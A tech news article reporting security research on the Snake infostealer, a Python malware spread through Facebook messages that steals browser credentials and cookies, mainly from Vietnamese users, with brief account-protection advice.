Facebook messages hijacked to steal personal info and details

Facebook messages hijacked to steal personal info and details

New research has revealed that threat actors are leveraging Facebook messages to deploy a sophisticated Python-based infostealer, known as Snake.

Researchers at Cyberason have shared details of the attack, indicating that Snake’s primary objective is to capture sensitive data and credentials from unsuspecting users.

It looks to be a relatively new campaign, which was first brought to light on X in August 2023, shows bias towards Vietnamese victims.

Facebook infostealer targeting Vietnamese users

The attack uses seemingly harmless RAR or ZIP files, which, once opened, trigger an infection sequence that involves two additional downloaders – a batch script and a cmd script. The cmd script is responsible for executing the Snake infostealer from an actor-controlled GitLab repo.

Cybereason has identified three distinct variants of the Snake infostealer – the third is an executable assembled by PyInstaller and targets users of the Coc Coc browser, suggesting a specific focus on Vietnamese users.

Once harvested, credentials and cookies are shared via numerous platforms, including Discord, GitHub, and Telegram.

The malware also targets Facebook accounts by extracting cookie information, which could indicate a goal of hijacking accounts, potentially for malicious purposes.

The connection to Vietnam is further reinforced by the naming conventions of the actor-controlled repositories, which allegedly reference the Vietnamese language in the source code.

Cybereason also noted that the malware targets other browsers used globally, including Brave, Chromium, Google Chrome Browser, Microsoft Edge, Mozilla Firefox, and Opera Web Browser.

The discovery comes amid increased scrutiny of Facebook for its perceived failure to assist victims of account takeovers.

TechRadar Pro has asked Meta to share information about how users can boost their protection against such attacks, and whether the company has any plans to prevent future attacks. In the meantime, users can follow best practices to help protect their accounts, including using complex passwords and two-factor authentication (2FA).

More from TechRadar Pro


Craig Hale

Leave a Reply